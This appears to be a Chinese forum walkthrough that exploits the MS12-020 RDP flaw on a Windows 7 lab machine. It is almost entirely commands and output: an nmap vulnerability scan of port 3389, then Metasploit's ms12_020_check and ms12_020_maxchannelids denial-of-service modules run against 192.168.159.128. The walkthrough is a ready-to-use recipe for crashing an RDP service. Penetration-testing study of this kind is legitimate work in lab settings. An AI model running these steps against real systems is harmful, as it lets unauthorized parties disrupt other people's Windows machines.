Win7下 MS12_020 漏洞利用
service postgresql start1. nmap
root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse
rdp-enum-encryption.nse
rdp-vuln-ms12-020.nse
2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
3. msfconsole
search ms12-020
(1) 漏洞检测
msf > useauxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128 设置远程ip
msf auxiliary(ms12_020_check) > show options 查看配置
Name Current SettingRequiredDescription
---- ----------------------------------
RHOSTS 192.168.159.128yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS1 yes The number of concurrent threads
msf auxiliary(ms12_020_check) > run
[+] 192.168.159.128:3389- 192.168.159.128:3389 - The target is vulnerable.漏洞存在
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2) 漏洞攻击
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128设置远程ip
rhost => 192.168.159.128
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > run
页:
[1]